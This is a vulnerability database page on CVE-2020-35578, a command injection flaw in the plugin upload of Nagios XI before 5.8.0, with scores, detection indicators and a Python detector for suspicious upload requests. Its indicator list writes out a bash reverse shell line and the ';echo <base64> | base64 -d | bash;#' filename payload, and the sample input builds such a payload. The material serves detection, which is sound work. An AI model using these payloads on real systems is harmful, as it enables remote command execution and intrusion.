cbcvebase.
CVE-2020-35578
published 2021-01-13

Priority: P2 (67)
CVSS 3.1: 7.2 High, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 81.92% (99.6th percentile)
An issue was discovered in the Manage Plugins page in Nagios XI before 5.8.0. Because the line-ending conversion feature is mishandled during a plugin upload, a remote, authenticated admin user can execute operating-system commands.

Affected (1 range)

Vendor   Product     Version range   Fixed in
nagios   nagios_xi   < 5.8.0         5.8.0

Detection & IOCs (extracted from sources)

url: /nagiosxi/admin/monitoringplugins.php
url: /nagiosxi/login.php
command: bash -i >& /dev/tcp/<ip>/<port> 0>&1
command: ;echo <base64> | base64 -d | bash;#
path: /nagiosxi/admin/monitoringplugins.php
  • Monitor POST requests to /nagiosxi/admin/monitoringplugins.php where the uploaded filename field (uploadedfile) contains shell metacharacters such as semicolons, pipe characters, or base64-encoded payloads rather than a legitimate plugin filename.
  • The exploit abuses the 'convert_to_unix' parameter (set to '1') in the plugin upload form to trigger line-ending conversion, which is the mishandled feature enabling command injection. Presence of this parameter alongside a suspicious filename is a strong indicator.
  • The injected filename payload follows the pattern: ;echo <base64_string> | base64 -d | bash;# — detect this pattern in multipart form-data filename fields on the monitoringplugins.php endpoint.
  • Successful exploitation results in command execution as the 'apache' user. Alert on unexpected outbound TCP connections (e.g., bash reverse shells) originating from the apache/www-data process on Nagios XI hosts.
  • The exploit first GETs /nagiosxi/admin/monitoringplugins.php to harvest a CSRF nsp token, then immediately POSTs the malicious upload. A GET immediately followed by a POST to this endpoint from the same session is a behavioral indicator.
  • Exploitation requires valid Nagios XI admin credentials — this is an authenticated vulnerability. Detections should be scoped to authenticated sessions targeting the admin plugin upload endpoint.
  • The vulnerability affects Nagios XI versions prior to 5.8.0. The Metasploit module was confirmed tested against versions 5.3.0 and 5.7.5 on CentOS 7; detections should prioritize unpatched instances below 5.8.0.
  • The root cause is mishandling of the line-ending conversion feature during plugin upload, not a generic file upload flaw. The 'convert_to_unix' parameter must be present and set to '1' for the injection path to be triggered.
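The indicators above, turned into detection logic as an added example (this is not code from the page's sources, from the Metasploit module, or from Nagios). It parses the multipart body of a POST to the plugin upload endpoint, checks the uploadedfile filename for shell metacharacters and the ";echo <base64> | base64 -d | bash;#" pattern, and only raises the CVE-specific indicator when convert_to_unix=1 is also present. The field names uploadedfile, convert_to_unix and nsp come from the page; the multipart boundary, token value, session ids and file contents are constructed sample input, and the GET-then-POST sequence check is a simplified model of the behavioural indicator.

```python
"""Detection logic for CVE-2020-35578 plugin-upload requests (added example, not the page's own code)."""
import base64
import re

TARGET_PATH = "/nagiosxi/admin/monitoringplugins.php"
# Shell metacharacters that never belong in a legitimate plugin filename.
SHELL_META = re.compile(r"[;|&`$()\n]")
# The published payload shape: ;echo <base64> | base64 -d | bash;#
B64_PIPE = re.compile(r";\s*echo\s+[A-Za-z0-9+/=]+\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh\s*;#")


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field_name: {"filename": str | None, "data": bytes}} for a multipart/form-data body."""
    parts = {}
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        header_blob, _, data = chunk.partition(b"\r\n\r\n")
        headers = header_blob.decode("latin-1")
        m_name = re.search(r'name="([^"]*)"', headers)
        if not m_name:
            continue
        m_file = re.search(r'filename="([^"]*)"', headers)
        parts[m_name.group(1)] = {
            "filename": m_file.group(1) if m_file else None,
            "data": data.rstrip(b"\r\n"),
        }
    return parts


def inspect_request(method: str, path: str, content_type: str, body: bytes) -> list:
    """Return the indicators matched by one HTTP request (empty list means nothing suspicious)."""
    hits = []
    if method.upper() != "POST" or path.split("?")[0] != TARGET_PATH:
        return hits
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        return hits
    parts = parse_multipart(body, m.group(1).strip().strip('"'))
    upload = parts.get("uploadedfile")
    fname = upload["filename"] if upload else None
    convert = parts.get("convert_to_unix", {}).get("data") == b"1"
    if fname and SHELL_META.search(fname):
        hits.append("shell metacharacters in uploadedfile filename")
    if fname and B64_PIPE.search(fname):
        hits.append("base64 | base64 -d | bash payload in filename")
    if convert and fname and SHELL_META.search(fname):
        hits.append("convert_to_unix=1 with suspicious filename (CVE-2020-35578 injection path)")
    return hits


def get_then_post_sessions(events) -> list:
    """events: (session_id, method, path) tuples in time order (constructed access-log rows).
    Returns session ids where a GET to the plugin page is immediately followed by a POST to it."""
    last, flagged = {}, []
    for sid, method, path in events:
        on_target = path.split("?")[0] == TARGET_PATH
        if on_target and method == "POST" and last.get(sid) == "GET" and sid not in flagged:
            flagged.append(sid)
        last[sid] = method if on_target else None
    return flagged


# --- constructed sample input (boundary, token value and file body are made up) ---
BOUNDARY = "----ExampleBoundaryX7"
CT = f"multipart/form-data; boundary={BOUNDARY}"


def _multipart(fields: dict, filename: str, content: bytes = b"#!/bin/sh\necho OK\n") -> bytes:
    """Build a multipart/form-data body shaped like the plugin upload form."""
    out = b""
    for name, value in fields.items():
        out += f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
    out += (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="uploadedfile"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode() + content + b"\r\n"
    return out + f"--{BOUNDARY}--\r\n".encode()


BENIGN = _multipart({"nsp": "deadbeef", "convert_to_unix": "1"}, "check_disk_custom.sh")
PAYLOAD = ";echo " + base64.b64encode(b"id > /tmp/pwned").decode() + " | base64 -d | bash;#"
MALICIOUS = _multipart({"nsp": "deadbeef", "convert_to_unix": "1"}, PAYLOAD)
EVENTS = [
    ("s1", "GET", "/nagiosxi/login.php"),
    ("s1", "GET", TARGET_PATH),
    ("s1", "POST", TARGET_PATH),
    ("s2", "GET", TARGET_PATH),
    ("s2", "GET", "/nagiosxi/index.php"),
    ("s2", "POST", TARGET_PATH),
]

if __name__ == "__main__":
    print("benign   :", inspect_request("POST", TARGET_PATH, CT, BENIGN))
    print("malicious:", inspect_request("POST", TARGET_PATH, CT, MALICIOUS))
    print("GET->POST sessions:", get_then_post_sessions(EVENTS))
```

The filename check is the high-confidence signal; the GET-then-POST sequence also fires for any admin who opens the page and uploads a legitimate plugin, so treat it as corroboration for the filename match rather than an alert on its own.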

CVSS provenance

NVD, CVSS v3.1: 7.2 HIGH, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 9.0 CRITICAL, AV:N/AC:L/Au:S/C:C/I:C/A:C